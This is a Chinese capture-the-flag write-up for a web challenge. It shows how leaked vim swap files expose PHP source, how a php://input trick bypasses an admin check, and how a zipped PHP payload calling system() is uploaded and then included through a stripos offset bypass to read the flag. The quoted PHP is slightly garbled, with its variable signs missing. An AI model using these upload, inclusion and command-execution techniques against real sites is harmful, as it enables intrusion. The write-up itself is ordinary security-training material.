攻防世界-web-ctf 1

工控云管理系统客服中心期待您的反馈
工控云管理系统客服中心存在漏洞，flag就在flag/flag/flag/flag/flag/flag/flag.php文件里面 http://47.104.188.226:20001 请找到这个隐藏的文件，swp？不不不。。。再找找。。
emmmm,这个题也是源码泄漏…
以后拿到题目没思路先把可能泄漏源码的地方试一遍再说….

http://47.104.188.226:20001/.index.php.swp
http://47.104.188.226:20001/.index.php.swo
http://47.104.188.226:20001/.index.php.swn
PHPCopy
这里就是源码泄漏,然后拿到index的源码

<?php error_reporting(0); ini_set('open_basedir', '/var/www/html'); function autoload(page) { if (stripos(_SERVER['QUERY_STRING'], 'flag') > 0) { die('no flag flag flag flag !'); } if (stripos(_SERVER['QUERY_STRING'], 'uploaded') > 0) { die('no uploaded uploaded uploaded uploaded !'); } if (stripos(_SERVER['QUERY_STRING'], '://f') > 0) { die('no ://f ://f ://f'); } if (stripos(_SERVER['QUERY_STRING'], 'ata') > 0) { die('no ata ata ata'); } if (stripos(_SERVER['QUERY_STRING'], '0') > 0) { die('no 0 0 0'); } if(file_exists("./includes/page.php")) { include "./includes/page.php"; } elseif(file_exists("./includes/page")) { include "./includes/page"; }else{ echo "File is not exit "; } } function download(adfile, file){ //Only Administrators can download files . cert = 'N'; if(isset(adfile) && file_get_contents(adfile, 'r') === 'Yeah Everything Will Be Ok My Boss') { echo "Welcome ! You Are Administrator !"; cert = 'Y'; }else{ echo "error1"; } if (cert === 'Y'){ if (stripos(file, 'file_list') != false) die('error4'); if (stripos(file, 'file_list') >= 0) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename='. basename(file)); header('Content-Transfer-Encoding: binary'); header('Expires: 0'); header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); header('Pragma: public'); header('Content-Length: ' . filesize(file)); readfile(file); }else{ die('error2'); } }else{ echo 'error3'; } } if(!isset(_GET['page'])) { page = 'index'; } else { page = _GET['page']; } if (stripos(page, './') > 0) { die('no ./ ./ ./ ./'); } if (stripos(page, '://') > 0) { die('no :// :// ://'); } autoload(page); if (isset(_GET[admin]) && isset(_GET[file])) { if (stripos(_GET[admin], 'flag') > 0 || stripos(_GET[file], 'flag') > 0) { die('not flag flag flag falg !'); } if (strlen(_GET[file]) >= 38) { die('too long'); } download(_GET[admin], _GET[file]); } ?>

PHPCopy
里面有一个文件下载的函数,只有通过了认证才可以下载,然后认证的部分是

if(isset(adfile) && file_get_contents(adfile, ‘r’) === ‘Yeah Everything Will Be Ok My Boss’) {
echo “Welcome ! You Are Administrator !”;
$cert = ‘Y’;
}
PHPCopy
这里绕过直接用php://input就可以了,然后通过file参数来下载upload.php

顺利拿到upload.php的源码

<?php if (stripos(_SERVER['QUERY_STRING'], 'flag') > 0) { die('no flag flag flag flag !'); } if (!empty(_FILES)) { //properties of the uploaded file name= _FILES["filename"]["name"]; type= _FILES["filename"]["type"]; size= _FILES["filename"]["size"]; temp= _FILES["filename"]["tmp_name"]; error= _FILES["filename"]["error"]; if (strlen(name) >= 6) { die('name is too long !'); } if (stripos(name, './') > 0) { die('invalid parameter'); } if (stripos(name, 'php') > 0) { die('invalid parameter'); } if (substr(name, -3, 3) !== 'zip' && substr(name, -3, 3) !== 'jpg' && substr(name, -3, 3) !== 'png') { die('file can not upload ! '); } if (error > 0) die("Error uploading file! code error."); else { if(type !== "application/zip" || size > 400)//condition for the file { die("Format not allowed or file size too big!"); } else { if(file_exists('includes')){ move_uploaded_file(temp, "includes/uploaded/" .name); echo "Upload complete a!"; shell_exec('sh /var/www/html/includes/unzip.sh'); }elseif(file_exists('uploaded')){ move_uploaded_file(temp, "uploaded/" .name); echo "Upload complete!"; shell_exec('sh /var/www/html/includes/unzip.sh'); } } } }else{ if(isset(_GET['step']) && strlen(_GET['step']) === 20) { if (stripos(_GET['step'], 'lag') > 0) { die('error'); } if (stripos(_GET['step'], './') > 0) { die('error'); } if (stripos(_GET['step'], ' ') > 0) { die('error'); } if (stripos(_GET['step'], '/') > 0) { die('error'); } if (preg_match('/[^\w\d_ -]/si', _GET['step'])) { _GET['step'] = preg_replace('/[^a-zA-Z0-9_ -]/s', '', _GET['step']); die('error'); } passthru('cat ' . 'uploaded/' . _GET['step']); }else{ die(); } } ?>

PHPCopy
看一下源码,balabala一大堆,发现就是可以上传一个zip文件嘛,然后名字不能太长,传上去之后会调用一个unzip.sh,访问一下http://47.104.188.226:20001/includes/unzip.sh
拿到了unzip.sh的源码

#/bin/bash
cd ./uploaded
find ./ -size +1M | xargs rm
cd …/
unzip -o ./uploaded/.zip -d ./uploaded/
rm -rf ./uploaded/.zip
rm -rf ./uploaded/.
rm -rf ./uploaded/.*
cd ./uploaded
find -type d | xargs rm -rf
touch /var/www/html/includes/uploaded/index.php
chmod 000 /var/www/html/includes/uploaded/index.php
PHPCopy
这个脚本会删除带.的文件而且会删除目录文件,最后创建一个index.php,但不给权限

那我们创建一个123,里面写一个

<?php system('cat flag/flag/flag/flag/flag/flag/flag.php'); ?>

PHPCopy
压缩成1.zip,上传,抓包改type为application/zip,然后上传和解压成功,之后就是包含这个文件拿flag了,index里面有包含的部分,但是那里对upload进行了检测

function autoload(page) { if (stripos(_SERVER[‘QUERY_STRING’], ‘flag’) > 0) {
die(‘no flag flag flag flag !’);
}
if (stripos(_SERVER[‘QUERY_STRING’], ‘uploaded’) > 0) { die(‘no uploaded uploaded uploaded uploaded !’); } if (stripos(_SERVER[‘QUERY_STRING’], ‘?/f’) > 0) {
die(‘no ?/f ?/f ?/f’);
}
if (stripos(_SERVER[‘QUERY_STRING’], ‘ata’) > 0) { die(‘no ata ata ata’); } if (stripos(_SERVER[‘QUERY_STRING’], ‘0’) > 0) {
die(‘no 0 0 0’);
}
if(file_exists("./includes/page.php")) { include “./includes/page.php”;
}
elseif(file_exists("./includes/page")) { include “./includes/page”;
}else{
echo "File is not exit ";
}
}
PHPCopy
这里用的是stripos,这个函数返回的是字符串第一次被匹配到的位置,但注意,字符串是从0开始记的,所以我们构造一个http://47.104.188.226:20001/index.php?uploaded&page=uploaded/123
那么就可以绕过了,包含之后拿到flag